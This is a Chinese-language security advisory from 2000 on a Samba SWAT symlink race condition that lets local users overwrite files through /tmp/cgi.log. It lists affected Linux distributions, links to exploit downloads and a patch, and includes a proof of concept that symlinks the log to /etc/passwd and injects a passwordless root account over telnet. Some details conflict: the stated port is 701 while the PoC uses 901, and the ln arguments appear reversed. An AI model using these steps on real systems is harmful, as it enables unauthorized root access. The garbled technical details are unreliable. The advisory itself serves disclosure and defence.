SAMBA SWAT 符号连接漏洞

发布时间：2000-11-03
更新时间：2000-11-03
严重程度：高
威胁程度：本地管理员权限
错误类型：竞争条件
利用方式：服务器模式

受影响系统

Samba Samba 2.0.7
   + RedHat Linux 7.0
   + RedHat Linux 6.2E sparc
   + RedHat Linux 6.2E i386
   + RedHat Linux 6.2E alpha
   + RedHat Linux 6.2 sparc
   + RedHat Linux 6.2 i386
   + RedHat Linux 6.2 alpha
   + RedHat Linux 6.1 sparc
   + RedHat Linux 6.1 i386
   + RedHat Linux 6.1 alpha
   + MandrakeSoft Linux Mandrake 7.1
   + MandrakeSoft Linux Mandrake 7.0
   + Debian Linux 2.3 sparc
   + Debian Linux 2.3 powerpc
   + Debian Linux 2.3 alpha
   + Debian Linux 2.3
   + Connectiva Linux 4.0
   + Connectiva Linux 3.0

详细描述
SAMBA软件是一套利用SMB协议允许你对WINDOWS，NT，OS/2和DOS进行文件共享
的程序，这个协议有时也参照LANMANGER和NETBIOS协议，其中SAMBA带的SWAT
工具--SAMBA的WEB管理工具可以用来远程管理SAMBA服务程序，并设置默认端口在701，当前版本存在一个漏洞有使本地用户能得到ROOT访问。

其中一个关于SWAT的LOG功能存在一个符号连接的问题，可以让用户覆盖任意文件。
在开启LOG记录的情况下，SWAT记录LOG在下面的目录下：

/tmp/cgi.log

这个文件记录了WEB服务的所有通信，但这个文件没有很好的限制权限来防止本地
用户进行符号连接到任意文件，他们可以连接到端口并任意输入想连接的文件。

测试代码
ln -s /tmp/cgi.log /etc/passwd

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash

也可以下载测试程序：

http://www.securityfocus.com/data/vulnerabilities/exploits/swat-exp.c
http://www.securityfocus.com/data/vulnerabilities/exploits/swat-exp.sh

解决方案
下载新的程序：

Samba Samba 2.0.7:

Miah patch Unoffical Patch
http://uberhax0r.net/~miah/swat/

相关信息

最近严重漏洞

SAMBA SWAT 符号连接漏洞